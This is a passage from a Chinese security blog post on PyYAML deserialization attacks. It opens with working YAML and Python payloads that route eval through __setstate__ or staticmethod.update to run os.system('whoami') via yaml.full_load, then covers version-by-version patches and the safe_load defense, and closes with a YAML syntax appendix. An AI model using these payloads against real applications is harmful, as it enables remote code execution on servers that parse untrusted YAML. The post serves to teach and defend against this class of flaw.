<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs py">exp = <span class="hljs-built_in">type</span>(<span class="hljs-string">&quot;exp&quot;</span>, (<span class="hljs-built_in">list</span>, ), &#123;<span class="hljs-string">&quot;__setstate__&quot;</span>: <span class="hljs-built_in">eval</span>&#125;)<br>exp.__setstate__(<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>转换成YAML：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs py">yaml.full_load(<span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">!!python/object/new:type</span><br><span class="hljs-string">args:</span><br><span class="hljs-string">  - exp</span><br><span class="hljs-string">  - !!python/tuple []</span><br><span class="hljs-string">  - &#123;&quot;__setstate__&quot;: !!python/name:eval &#125;</span><br><span class="hljs-string">state: &quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span><br><span class="hljs-string">&quot;&quot;&quot;</span>)<br></code></pre></td></tr></table></figure>

<h4 id="slotstate-update"><a href="#slotstate-update" class="headerlink" title="slotstate.update()"></a>slotstate.update()</h4><p><code>type</code>可以用 <code>staticmethod</code> 来替换，<code>set_python_instance_state</code> 中存在调用：<code>slotstate.update()</code>，只需要将<code>slotstate.update</code> 赋值为 <code>eval</code>，<code>state</code>赋值为payload即可：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs py">exp = <span class="hljs-built_in">staticmethod</span>([<span class="hljs-number">0</span>])<br>exp.__dict__.update(<br>    &#123;<span class="hljs-string">&quot;update&quot;</span>: <span class="hljs-built_in">eval</span>, <span class="hljs-string">&quot;items&quot;</span>: <span class="hljs-built_in">list</span>&#125;<br>)<br>exp_raise = <span class="hljs-built_in">str</span>()<br><span class="hljs-comment"># 由于 str 没有 __dict__ 方法，所以在 PyYAML 解析时会触发下面调用</span><br><br>exp.update(<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>转换成YAML就是：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs py">yaml.full_load(<span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">!!python/object/new:str</span><br><span class="hljs-string">    args: []</span><br><span class="hljs-string">    # 通过 state 触发调用</span><br><span class="hljs-string">    state: !!python/tuple</span><br><span class="hljs-string">      - &quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span><br><span class="hljs-string">      # 下面构造 exp</span><br><span class="hljs-string">      - !!python/object/new:staticmethod</span><br><span class="hljs-string">        args: []</span><br><span class="hljs-string">        state: </span><br><span class="hljs-string">          update: !!python/name:eval</span><br><span class="hljs-string">          items: !!python/name:list  # 不设置这个也可以，会报错但也已经执行成功</span><br><span class="hljs-string">&quot;&quot;&quot;</span>)<br></code></pre></td></tr></table></figure>



<h2 id="PyYAML-x3D-5-2"><a href="#PyYAML-x3D-5-2" class="headerlink" title="PyYAML &#x3D; 5.2"></a>PyYAML &#x3D; 5.2</h2><blockquote>
<p>默认构造器：FullConstructor</p>
<p>不支持标签：python&#x2F;object&#x2F;apply</p>
</blockquote>
<h2 id="PyYAML-x3D-5-3-1"><a href="#PyYAML-x3D-5-3-1" class="headerlink" title="PyYAML &#x3D; 5.3.1"></a>PyYAML &#x3D; 5.3.1</h2><blockquote>
<p>默认构造器：FullConstructor</p>
<p>不支持标签：python&#x2F;object&#x2F;apply</p>
</blockquote>
<p>此版本打了个补丁，禁止在使用<code>set_python_instance_state</code>方法时设置任意属性，设置黑名单过滤了<code>extend</code>以及<code>__xxx__</code>方法，详见<a target="_blank" rel="noopener" href="https://github.com/yaml/pyyaml/pull/386">issue</a>。</p>
<blockquote>
<p>​	This patch tries to block such attacks in FullLoader by preventing <code>set_python_instance_state</code> from setting arbitrary properties. It implements a blacklist that includes <code>extend</code> method (called by construct_python_object_apply) and all special methods (e.g. <code>__set__</code>,<code>__setitem__</code>, etc.).</p>
<p>FROM <a target="_blank" rel="noopener" href="https://github.com/yaml/pyyaml/pull/386/files#diff-778c6b991749c6ca88cbbb56467e23500e874edb53c9bcc7d1e54a54ca1e10a2">lib&#x2F;yaml&#x2F;constructor.py</a>：</p>
<p>​	<code>blacklist_regex = [&#39;^extend$&#39;, &#39;^__.*__$&#39;]</code></p>
</blockquote>
<h2 id="PyYAML-x3D-5-4"><a href="#PyYAML-x3D-5-4" class="headerlink" title="PyYAML &#x3D; 5.4"></a>PyYAML &#x3D; 5.4</h2><blockquote>
<p>默认构造器：FullConstructor</p>
<p>不支持标签：python&#x2F;object&#x2F;apply、python&#x2F;object、python&#x2F;object&#x2F;new、python&#x2F;module</p>
<p>仅支持：python&#x2F;name</p>
</blockquote>
<h2 id="PyYAML-x3D-6-0"><a href="#PyYAML-x3D-6-0" class="headerlink" title="PyYAML &#x3D; 6.0"></a>PyYAML &#x3D; 6.0</h2><blockquote>
<p>默认构造器：无默认构造器，使用<code>yaml.load()</code>时必须指定参数Loader。</p>
<p>不支持标签：python&#x2F;object&#x2F;apply、python&#x2F;object、python&#x2F;object&#x2F;new、python&#x2F;module</p>
<p>仅支持：python&#x2F;name</p>
</blockquote>
<h1 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h1><p>使用<code>yaml.safe_load()</code>即可。</p>
<h1 id="附录"><a href="#附录" class="headerlink" title="附录"></a>附录</h1><h2 id="YAML语法"><a href="#YAML语法" class="headerlink" title="YAML语法"></a>YAML语法</h2><h3 id="基本语法"><a href="#基本语法" class="headerlink" title="基本语法"></a>基本语法</h3><ul>
<li>大小写敏感</li>
<li>使用缩进表示层级关系</li>
<li>缩进不允许使用tab，只允许空格</li>
<li>缩进的空格数不重要，只要相同层级的元素左对齐即可</li>
<li>‘#’表示注释</li>
</ul>
<h3 id="数据类型"><a href="#数据类型" class="headerlink" title="数据类型"></a>数据类型</h3><p>注意 <code>:</code>、<code>?</code>、<code>-</code>后面<strong>都需要跟一个空格。</strong></p>
<ul>
<li><p>对象：键值对的集合，又称为映射（mapping）&#x2F; 哈希（hashes） &#x2F; 字典（dictionary）</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-comment">#一般对象，包含属性，以键值对表示</span><br><span class="hljs-attr">obj:</span> <br>    <span class="hljs-attr">key1:</span> <span class="hljs-string">value</span><br>    <span class="hljs-attr">key2:</span> <span class="hljs-string">value2</span><br><span class="hljs-comment">#复杂对象，键名可以是一个数组，值也是数组</span><br><span class="hljs-string">?</span>  <br>    <span class="hljs-bullet">-</span> <span class="hljs-string">complexkey1</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-string">complexkey2</span><br><span class="hljs-string">:</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-string">complexvalue1</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-string">complexvalue2</span><br>    <span class="hljs-comment"># [complexkey1,complexkey2] =&gt; [complexvalue1,complexvalue2]</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>数组：一组按次序排列的值，又称为序列（sequence） &#x2F; 列表（list）</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-comment">#以 - 开头表示是一个数组</span><br><span class="hljs-bullet">-</span> <span class="hljs-string">A</span><br><span class="hljs-bullet">-</span> <span class="hljs-string">B</span><br><span class="hljs-bullet">-</span> <span class="hljs-string">C</span><br><span class="hljs-comment">#对象数组</span><br><span class="hljs-attr">companies:</span><br>    <span class="hljs-bullet">-</span><br>        <span class="hljs-attr">id:</span> <span class="hljs-number">1</span><br>        <span class="hljs-attr">name:</span> <span class="hljs-string">company1</span><br>        <span class="hljs-attr">price:</span> <span class="hljs-string">200W</span><br>    <span class="hljs-bullet">-</span><br>        <span class="hljs-attr">id:</span> <span class="hljs-number">2</span><br>        <span class="hljs-attr">name:</span> <span class="hljs-string">company2</span><br>        <span class="hljs-attr">price:</span> <span class="hljs-string">500W</span><br>        <span class="hljs-comment">#companies: [&#123;id: 1,name: company1,price: 200W&#125;,&#123;id: 2,name: company2,price: 500W&#125;]</span><br><span class="hljs-comment">#复合结构，对象包含多类型属性</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>纯量（scalars）：单个的、不可再分的值</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-attr">boolean:</span> <br>    <span class="hljs-bullet">-</span> <span class="hljs-literal">TRUE</span>  <span class="hljs-comment">#true,True都可以</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-literal">FALSE</span>  <span class="hljs-comment">#false，False都可以</span><br><span class="hljs-attr">float:</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-number">3.14</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-number">6.8523015e+5</span>  <span class="hljs-comment">#可以使用科学计数法</span><br><span class="hljs-attr">int:</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-number">123</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-string">0b1010_0111_0100_1010_1110</span>    <span class="hljs-comment">#二进制表示</span><br><span class="hljs-attr">null:</span><br>    <span class="hljs-attr">nodeName:</span> <span class="hljs-string">&#x27;node&#x27;</span><br>    <span class="hljs-attr">parent:</span> <span class="hljs-string">~</span>  <span class="hljs-comment">#使用~表示null</span><br><span class="hljs-attr">string:</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-string">哈哈</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-string">&#x27;Hello world&#x27;</span>  <span class="hljs-comment">#可以使用双引号或者单引号包裹特殊字符</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-string">newline</span><br>      <span class="hljs-string">newline2</span>    <span class="hljs-comment">#字符串可以拆成多行，每一行会被转化成一个空格</span><br><span class="hljs-attr">date:</span><br>    <span class="hljs-bullet">-</span> <span class="hljs-number">2018-02-17</span>    <span class="hljs-comment">#日期必须使用ISO 8601格式，即yyyy-MM-dd</span><br><span class="hljs-attr">datetime:</span> <br>    <span class="hljs-bullet">-</span>  <span class="hljs-number">2018-02-17T15:02:31+08:00</span>    <span class="hljs-comment">#时间使用ISO 8601格式，时间和日期之间使用T连接，最后使用+代表时区</span><br></code></pre></td></tr></table></figure></li>
</ul>
<h3 id="引用"><a href="#引用" class="headerlink" title="引用"></a>引用</h3><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-comment"># &amp; 用来建立锚点（defaults），&lt;&lt; 表示合并到当前数据，* 用来引用锚点</span><br><span class="hljs-attr">defaults:</span> <span class="hljs-meta">&amp;defaults</span><br>  <span class="hljs-attr">adapter:</span>  <span class="hljs-string">postgres</span><br>  <span class="hljs-attr">host:</span>     <span class="hljs-string">localhost</span><br><span class="hljs-attr">test:</span><br>  <span class="hljs-attr">database:</span> <span class="hljs-string">myapp_test</span><br>  <span class="hljs-string">&lt;&lt;:</span> <span class="hljs-meta">*defaults</span><br> <br><span class="hljs-comment">#相当于：</span><br><br><span class="hljs-attr">defaults:</span><br>  <span class="hljs-attr">adapter:</span>  <span class="hljs-string">postgres</span><br>  <span class="hljs-attr">host:</span>     <span class="hljs-string">localhost</span><br><span class="hljs-attr">test:</span><br>  <span class="hljs-attr">database:</span> <span class="hljs-string">myapp_test</span><br>  <span class="hljs-attr">adapter:</span>  <span class="hljs-string">postgres</span><br>  <span class="hljs-attr">host:</span>     <span class="hljs-string">localhost</span><br>  <br></code></pre></td></tr></table></figure>

<h1 id="REF"><a href="#REF" class="headerlink" title="REF"></a>REF</h1><p><a target="_blank" rel="noopener" href="https://www.tr0y.wang/2022/06/06/SecMap-unserialize-pyyaml/">SecMap - 反序列化（PyYAML） - Tr0y’s Blog</a></p>
<p><a target="_blank" rel="noopener" href="https://boogipop.com/2023/03/02/PyYAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96">https://boogipop.com/2023/03/02/PyYAML反序列化</a></p>
<p><a target="_blank" rel="noopener" href="https://pyyaml.org/wiki/PyYAMLDocumentation">https://pyyaml.org/wiki/PyYAMLDocumentation</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/python%E5%AE%89%E5%85%A8/" class="category-chain-item">python安全</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/PyYaml/">#PyYaml</a>
      
        <a href="/tags/python%E5%AE%89%E5%85%A8/">#python安全</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>PyYaml反序列化</div>
      <div>http://example.com/2023/05/17/PyYaml反序列化/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>springtime</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>May 17, 2023</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>Licensed under</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/05/25/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E4%B8%80/" title="Java反序列化漏洞一">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Java反序列化漏洞一</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/05/09/python%20SSTI/" title="python SSTI">
                        <span class="hidden-mobile">python SSTI</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;Table of Contents</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
